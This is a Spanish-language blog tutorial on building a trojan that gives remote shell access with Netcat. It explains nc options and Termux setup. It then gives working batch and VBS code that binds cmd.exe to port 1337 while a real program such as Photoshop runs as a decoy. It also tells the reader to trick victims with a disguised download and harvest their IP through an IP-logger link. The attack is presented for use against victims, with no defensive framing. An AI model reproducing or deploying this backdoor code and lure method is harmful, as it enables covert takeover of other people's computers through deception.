Install a Exploit Persistant Backdoor Using Netcat
Instale una puerta trasera persistente de explotación mediante Netcat
Netcat es una herramienta de red que permite a través de intérprete de comandos y con una sintaxis sencilla abrir puertos TCP/UDP en un HOST (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a MS-DOS o al intérprete bash de Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos). Fue originalmente desarrollada por Hobbit en 1996 y liberada bajo una licencia de software libre permisiva (no copyleft, similar a BSD, MIT) para UNIX. Posteriormente fue portada a Windows y Mac OS X entre otras plataformas. Existen muchos forks de esta herramienta que añaden características nuevas como GNU Netcat o Cryptcat. wikipedia
Entre sus múltiples aplicaciones, es frecuente la depuración de aplicaciones de red. También es utilizada a menudo para abrir puertas traseras en un sistema.
Exploit remoto. Si utiliza una red de comunicaciones para entrar en contacto con el sistema víctima. Por ejemplo puede usar otro equipo dentro de la misma red interna o tener acceso desde la propia Internet.
- https://eternallybored.org/misc/netcat/
- https://joncraton.org/files/nc111nt_safe.zip
- https://joncraton.org/blog/46/netcat-for-windows/
- https://github.com/Pericena/cat
Download IcoFX
Download & setup ngrok
netcat
Photoshop
Download nc111nt.zip (password:nc) - Netcat for Windows
- http://netcat.sourceforge.net/download.php
- https://sectools.org/tool/netcat/
- apt install nc
- apt update
- pkg install git
- pkg install sh
- pkg install nc
- pkg install php
- pkg install openssh
- git clone https://github.com/Pericena/cat
- cd cat
- bash cat.sh
- nc %puerto%
https://lpericena.blogspot.com/2020/05/termux-instalar-ngrok.html
La línea básica de comandos para Netcat es nc [opciones] host puertos, donde host es la dirección IP que se desea analizar y puertos es o un determinado puerto o un rango de puertos o una serie de puertos separados por espacios. Echemos un vistazo a cada una de las opciones.
-help
- -d Permite que nc trabaje en forma silenciosa y se desenganche del indicador de comandos MS-DOS.
- -e
Un nc a la escucha podrá ejecutar el en el instante en que alguien se conecte al puerto en el que está escuchando. - -i
Intervalo de espera, que es la cantidad de tiempo que nc esperará entre dos envíos de datos sucesivos. - -g
Se pueden especificar hasta 8 opciones –g en la línea de comandos para forzar que su tráfico nc pase por determinadas direcciones IP. - -G
Esta opción le permitirá definir que dirección IP va a ser el siguiente salto dentro de la ruta indicada con la opción –g. - -l Activa el modo escucha de nc.
- -L Activa el modo escucha de nc pero con más interés.
- -n Indica a nc que no realice ninguna consulta de nombres de hosts.
- -o
Realiza un volcado hexadecimal de los datos y los almacena en un archivo hexadecimal. - -p
Le permite especificar el puerto local que va a utilizar nc. - -r Nc elegirá aleatoriamente los puertos locales y remotos.
- -s Especifica la dirección IP de origen que deberá utilizar nc cuando efectue sus conexiones.
- -t Es capaz de controlar la negociación de opciones Telnet.
- -u Indica a nc que utilice UDP en lugar de TCP.
- -v Informa el estado de nc, si pones otra –v podrás obtener más información.
- -w
Controla cuanto tiempo va a esperar nc antes de dar por terminada una conexión. - -z Le dice a nc que envíe la cantidad de datos necesarias para conocer en que puertos se está escuchando algo.
lo que aremos es hacerle creer a nuestra victima que le pasaremos un programa "x" ejemplo :photoshop ,hack ,ultraiso,vpn, otros programas . Todos los archivos deben ser subido en un servidor de almacenamiento , para lograr nuestro objetivo debemos ponerlo en un acortado de link llamados iplogger lo encontras en este link :) https://lpericena.blogspot.com/2019/09/grabify-geolocalizacion-traves-de-enlace.html
Instalación victima
Una vez descarga los programas lo que ara el xploits sera instalar el programa real , pero mientras tanto se ejecutara el payloads en segundo plano abriendo un shell remota .
╔═══════ ≪ °❈° ≫ ═══════╗
@echo off
TITLE Remote
cls
cd programa
nc.exe -lvp 1337 -e cmd.exe
╚═══════ ≪ °❈° ≫ ═══════╝
payloads.exe nos permitirá abrir una puerta de enlace
Código de script.vbs
╔═══════ ≪ °❈° ≫ ═══════╗
Set WshShell=CreateObject("WScript.Shell")
WshShell.Run chr(34) & "payloads.exe" & Chr(34),0
Set WshShell=Nothing
╚═══════ ≪ °❈° ≫ ═══════╝
script.vbs nos permitira ejecutar el payloads en segundo plano
Código xploits.exe
╔═══════ ≪ °❈° ≫ ═══════╗
@echo off
TITLE install
cls
cd programa
start PSCS6.exe
start script.vbs
exit
╚═══════ ≪ °❈° ≫ ═══════╝
xploits.exe nos permitirá ejecutar el archivo vbs y exe
Observamos que nuestro expoits esta funcionando el programa photoshop funciona correctamente al igual que el script.vbs se ejecuta en segundo plano con el puerto 1337
Para este ataque necesitamos la ip de la victima como sabemos el puerto que usaremos sera 1337 , al usar el link de acortadores link aquí (0.0)=" https://lpericena.blogspot.com/2019/09/grabify-geolocalizacion-traves-de-enlace.html " podemos también obtener la ip del visitante en este caso seria la victima
✎windows
ejecutamos el nc.exe para poder introducir los datos o usar en la shell nc -n -v ip 1337
pero tenemos otra opción ejecutando xploitsnc.exe
abrimos la app introducimos en nuestra terminal el comando nc IP 1337
Comentarios
Publicar un comentario
Únete a la conversación y comparte tú Opinión